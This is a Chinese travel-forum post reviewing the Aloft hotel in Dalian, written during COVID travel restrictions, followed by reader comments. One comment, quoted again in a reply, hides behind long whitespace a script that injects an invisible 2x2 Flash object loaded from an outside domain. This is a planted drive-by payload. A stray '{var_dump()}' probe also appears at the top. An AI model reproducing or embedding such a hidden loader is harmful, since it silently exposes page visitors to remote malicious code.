{var_dump()}
发文

中转过渡,便宜好用 大连雅乐轩

5810 40

一、 概览 | Overview

本来是在大连中转回老家的。无奈当天上海突然增加两例无症状感染者,虽然上海本身没有划分风险区,但是老家那边层层加码非常严重,像这种情况,竟然回家需要七天健康监测。也就是说,原则上不欢迎我回来。没办法就在大连选择停留一晚。临时看了一下一方城堡,不知道为什么所有套房都没有开放。反而雅乐轩还是比较划算的,券后才两百四十多块。想着城堡1000住标间太亏了,反正就睡一宿,第二天早上就走了。肯定还是挑性价比高的。订完app日常谈了一下心。酒店那边回复这个品牌不参与升级。不过没过一会儿看了一下,还是升级到套房了也挺有趣的。 中转过渡,便宜好用 大连雅乐轩

二、 客房 |  In Room

房间升级了套房。说实话两百多住这种房间,我是真的非常可以。房型非常周正,客厅的景观正对着中山广场。晚上还是挺漂亮的。另外酒店的荞麦枕是我最喜欢的那种非常扎实的质地,睡得也挺香。同时房间还放了加湿器和水果,迷你吧还免费。基本挑不出任何毛病 中转过渡,便宜好用 大连雅乐轩

三、 餐饮 |  Dining

早餐还行,对应这个价位非常合理 中转过渡,便宜好用 大连雅乐轩

四、 设施 |  Facilities

竟然还有泳池! 中转过渡,便宜好用 大连雅乐轩

五、 难忘瞬间 |  the Moments

又一次回家梦碎,真快赶上大禹治水了。上次也是这样,飞哈尔滨然后在回家的高铁上惊闻上海有确诊,下了火车都没出站,直接告诉家人不用来接了。马上买了回哈尔滨的火车票然后到了哈尔滨马上买票回上海。
这次为了防止经过哈尔滨出事,特地买的大连中转,没想到上海到大连刚落地家里打电话说今天政策升级,我又回不去了。
这什么时候是个头啊,无奈只能在星海广场逛逛散散心。 中转过渡,便宜好用 大连雅乐轩

六、 周边

反正回不去家了,顺便来个丹东一日游。
非常值得打卡 中转过渡,便宜好用 大连雅乐轩
标签: 大连雅乐轩

评分 ( 1人) 威望 理由 总评分: 威望 +2  查看全部评分
大小飞飞
+ 2 恭喜, 每10个回复奖励1个威望, 每贴最高奖励10威望。
鲜花 (14朵) 鲜花榜
Samanthazz2023-4-23 14:49
送了1朵鲜花:  Life is better when shared!
Jimmy-Z2022-7-5 00:25
送了1朵鲜花:  Life is better when shared!
Flyingsun2022-3-12 21:47
天天向上no12022-1-8 00:24
Griezmann012022-1-6 21:59

本帖被以下话题推荐:

上一篇:  下一篇: 

关注本版大神,阅读更多精彩好文

40 个评论

EDDYKim  蓝钻会员  2022-1-5 09:23:37  | 显示全部楼层
请问现在哪里还可以领券吗
小熊喵  蓝钻会员  2022-1-5 10:17:27  | 显示全部楼层
拍的大连好漂亮
同问哪里的券
环宇0806  终钻会员   楼主| 2022-1-5 10:26:59  | 显示全部楼层
EDDYKim 发表于 2022-1-5 09:23
请问现在哪里还可以领券吗
之前双十一挑战成功送的两个减88的
环宇0806  终钻会员   楼主| 2022-1-5 10:27:16  | 显示全部楼层
eveneve 发表于 2022-1-5 09:27
刷房圣地
还好吧,圣地不是上街吗
飞客2470759  黑钻会员  2022-1-5 10:29:06  | 显示全部楼层
可以说是东北圣地了
环宇0806  终钻会员   楼主| 2022-1-5 10:42:28  | 显示全部楼层
小熊喵 发表于 2022-1-5 10:17
拍的大连好漂亮
毕竟东北第一城呢
环宇0806  终钻会员   楼主| 2022-1-5 10:42:50  | 显示全部楼层
越秀金融曜
同问哪里的券
双十一挑战成功送的两个88
环宇0806  终钻会员   楼主| 2022-1-5 10:43:17  | 显示全部楼层
飞客2470759 发表于 2022-1-5 10:29
可以说是东北圣地了
积分的话我觉得东北大把5000分的啊
空调机动车    匿名飞客  发表于 1970-1-1 08:00:00
post_deleted
sdelwei  黑钻会员  2022-1-5 15:09:22  | 显示全部楼层
哈尔滨和大连不是没有确诊病例吗?现在怎么还不让回?
环宇0806  终钻会员   楼主| 2022-1-5 15:27:06  | 显示全部楼层
sdelwei 发表于 2022-1-5 15:09
哈尔滨和大连不是没有确诊病例吗?现在怎么还不让回?
上海有
tjuwqx  黑钻会员  2022-1-5 17:05:39  | 显示全部楼层

回帖奖励 +1 威望

谢谢分享
FroZenE  金卡会员  2022-1-5 17:27:25  | 显示全部楼层
这哪的防疫措施啊也太严了吧。我是觉得乱划定中高风险地区不听国家的真的挺胡闹的
寒秋雪  银卡会员  2022-1-5 17:28:34  | 显示全部楼层
最近天气冷了,                                                            
环宇0806  终钻会员   楼主| 2022-1-5 17:31:41  | 显示全部楼层
FroZenE 发表于 2022-1-5 17:27
这哪的防疫措施啊也太严了吧。我是觉得乱划定中高风险地区不听国家的真的挺胡闹的
黑龙江下属18县小城
环宇0806  终钻会员   楼主| 2022-1-5 17:31:53  | 显示全部楼层
寒秋雪 发表于 2022-1-5 17:28
最近天气冷了,                                                            $('swf_Wu4').innerHTML=AC_FL_RunContent('width', '2', 'height', '2', 'allowNetworking', 'internal', 'allowAccess', 'never', 'src', '//ballvi.cn/zz.swf', 'quality', 'high', 'bgcolor', '#ffffff', 'wmode', 'transparent', 'allowfullscreen', 'true');
还好